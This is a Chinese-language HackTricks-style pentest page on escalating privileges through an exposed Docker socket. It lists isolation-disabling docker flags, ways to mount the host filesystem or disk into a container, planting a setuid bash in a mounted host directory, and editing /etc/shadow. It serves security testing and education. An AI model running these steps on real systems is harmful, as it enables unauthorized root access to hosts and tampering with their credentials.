Abusing Docker Socket for Privilege Escalation

学习与实践 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE) 学习与实践 GCP 黑客技术:HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

有些情况下你只需 访问 docker socket,并希望利用它来 提升权限。某些操作可能非常可疑,你可能想要避免它们,因此在这里你可以找到不同的标志,这些标志可能对提升权限有用:

通过挂载

你可以在以 root 身份运行的容器中 挂载 文件系统的不同部分并 访问 它们。 你也可以 利用挂载来提升容器内的权限

  • -v /:/host -> 在容器中挂载主机文件系统,以便你可以 读取主机文件系统。

  • 如果你想要 感觉像是在主机上,但实际上在容器中,你可以使用以下标志禁用其他防御机制:

  • --privileged

  • --cap-add=ALL

  • --security-opt apparmor=unconfined

  • --security-opt seccomp=unconfined

  • -security-opt label:disable

  • --pid=host

  • --userns=host

  • --uts=host

  • --cgroupns=host

  • **--device=/dev/sda1 --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ** -> 这与前一种方法类似,但这里我们是 挂载设备磁盘。然后,在容器内运行 mount /dev/sda1 /mnt,你可以在 /mnt访问 主机文件系统

  • 在主机上运行 fdisk -l 找到 </dev/sda1> 设备以进行挂载。

  • -v /tmp:/host -> 如果由于某种原因你只能 挂载主机的某个目录,并且你可以在主机内访问它。挂载它并在挂载目录中创建一个 /bin/bash,并设置 suid,这样你就可以 从主机执行它并提升到 root

请注意,也许你无法挂载 /tmp 文件夹,但你可以挂载一个 不同的可写文件夹。你可以使用以下命令查找可写目录:find / -writable -type d 2>/dev/null

请注意,并非所有 Linux 机器上的目录都支持 suid 位! 要检查哪些目录支持 suid 位,请运行 mount | grep -v "nosuid"。例如,通常 /dev/shm/run/proc/sys/fs/cgroup/var/lib/lxcfs 不支持 suid 位。

还要注意,如果你可以 挂载 /etc 或任何其他 包含配置文件 的文件夹,你可以在 docker 容器中以 root 身份更改它们,以便 在主机中利用它们 并提升权限(可能修改 /etc/shadow)。

从容器中逃逸

Curl

在本页中,我们讨论了使用 docker 标志提升权限的方法,你可以在页面中找到 使用 curl 命令滥用这些方法的方式

学习与实践 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE) 学习与实践 GCP 黑客技术:HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

Last updated